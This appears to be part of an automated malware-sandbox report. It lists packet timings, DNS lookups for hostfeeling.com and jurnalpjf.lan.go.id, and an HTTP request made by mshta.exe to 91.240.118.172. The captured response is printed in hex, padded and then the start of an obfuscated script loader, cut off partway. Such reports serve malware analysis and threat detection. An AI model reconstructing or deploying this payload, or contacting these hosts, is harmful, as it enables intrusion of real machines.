                                                                                                                    Jan 28, 2022 21:18:50.834765911 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834774971 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.834783077 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834794998 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.834799051 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834815025 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834815979 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.834830999 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834846020 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834860086 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.834861040 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834877014 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834892988 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834904909 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.834908009 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834923029 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834939003 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.834940910 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.834964991 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.836518049 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836543083 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836558104 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836574078 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836590052 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836597919 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.836602926 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.836607933 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836625099 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836639881 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836652994 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.836657047 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836673975 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836685896 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.836688995 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836704969 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836720943 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836734056 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.836735964 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836751938 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836765051 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.836766958 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836782932 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836797953 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836812019 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.836812973 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836828947 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836844921 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836857080 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.836859941 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836875916 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836891890 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836905003 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:50.836906910 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836924076 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:50.836951971 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.014142990 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014173985 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014190912 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014206886 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014223099 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014241934 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014264107 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014282942 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014301062 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014300108 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.014321089 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.014322042 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014343977 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014358044 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.014364958 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014405012 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014414072 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.014426947 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014450073 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014456987 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.014472961 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014492989 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014504910 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.014513016 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014534950 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014542103 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.014554024 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014574051 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.014584064 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.015861988 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.015886068 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.015933990 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016053915 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016098976 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016154051 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016180992 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016187906 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016204119 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016216040 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016309023 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016340971 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016370058 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016412020 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016428947 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016443968 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016452074 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016458035 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016472101 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016490936 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016491890 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016508102 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016520023 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016521931 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016535997 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016547918 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016552925 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016576052 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016581059 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016585112 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016592979 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016608953 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016623974 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016623974 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016639948 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016654015 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016655922 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016670942 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016685963 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.016686916 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.016719103 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.193804026 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193836927 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193883896 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193901062 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193917036 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193945885 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.193953037 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193969011 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193974972 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.193985939 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.193999052 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.194001913 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194019079 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194029093 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.194036007 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194052935 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194065094 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.194067955 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194083929 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194099903 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194102049 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.194114923 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194129944 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.194130898 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194147110 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194161892 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194178104 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.194227934 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.195940971 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.195966959 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.195982933 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.195998907 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196000099 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196014881 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196033955 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196043015 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196053982 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196063042 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196072102 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196093082 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196101904 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196115017 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196135044 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196145058 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196158886 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196182966 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196191072 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196202993 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196227074 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196233988 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196249008 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196269035 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196290016 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196290970 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196315050 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196319103 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196340084 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196363926 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196367979 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196386099 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196408033 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196413994 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196430922 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196451902 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196460009 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196472883 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196494102 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196501017 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196517944 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196542978 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196549892 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.196566105 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.196593046 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373228073 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373260021 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373276949 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373294115 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373310089 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373326063 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373342037 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373358011 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373374939 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373378038 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373390913 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373399973 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373405933 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373421907 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373421907 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373437881 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373454094 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373471022 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373471022 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373486996 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373487949 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373503923 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373518944 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373522997 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373537064 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373552084 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373553038 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373569012 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373584032 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.373584032 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.373615026 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.375550985 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375581980 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375602007 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375622988 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375629902 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.375639915 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375653982 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.375663042 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375682116 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375694990 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.375699043 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375719070 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375727892 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.375739098 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375755072 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:51.375768900 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:51.609654903 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:18:56.201759100 CET8049170103.206.244.105192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:56.201906919 CET4917080192.168.2.22103.206.244.105
                                                                                                                    Jan 28, 2022 21:19:32.775798082 CET804916891.240.118.172192.168.2.22
                                                                                                                    Jan 28, 2022 21:19:32.775901079 CET4916880192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:20:07.823296070 CET4916880192.168.2.2291.240.118.172
                                                                                                                    Jan 28, 2022 21:20:07.884641886 CET804916891.240.118.172192.168.2.22

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 28, 2022 21:18:27.823419094 CET5216753192.168.2.228.8.8.8
                                                                                                                    Jan 28, 2022 21:18:28.062777996 CET53521678.8.8.8192.168.2.22
                                                                                                                    Jan 28, 2022 21:18:49.192480087 CET5059153192.168.2.228.8.8.8
                                                                                                                    Jan 28, 2022 21:18:49.210891008 CET53505918.8.8.8192.168.2.22

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                    Jan 28, 2022 21:18:27.823419094 CET192.168.2.228.8.8.80x7e8eStandard query (0)hostfeeling.comA (IP address)IN (0x0001)
                                                                                                                    Jan 28, 2022 21:18:49.192480087 CET192.168.2.228.8.8.80xf8cfStandard query (0)jurnalpjf.lan.go.idA (IP address)IN (0x0001)

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                    Jan 28, 2022 21:18:28.062777996 CET8.8.8.8192.168.2.220x7e8eNo error (0)hostfeeling.com164.90.147.135A (IP address)IN (0x0001)
                                                                                                                    Jan 28, 2022 21:18:49.210891008 CET8.8.8.8192.168.2.220xf8cfNo error (0)jurnalpjf.lan.go.id103.206.244.105A (IP address)IN (0x0001)

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • 91.240.118.172
                                                                                                                    • jurnalpjf.lan.go.id

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    0192.168.2.224916791.240.118.17280C:\Windows\System32\mshta.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    Jan 28, 2022 21:18:21.887382984 CET0OUTGET /gg/ff/fe.html HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: 91.240.118.172
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 28, 2022 21:18:21.949342966 CET2INHTTP/1.1 200 OK
                                                                                                                    Server: nginx/1.20.2
                                                                                                                    Date: Fri, 28 Jan 2022 20:18:21 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Data Raw: 32 62 32 65 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6d 59 32 4b 63 49 38 48 57 51 50 41 38 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 71 35 32 4c 69 36 36 38 4d 36 38 70 52 5b 30 5d 3d 27 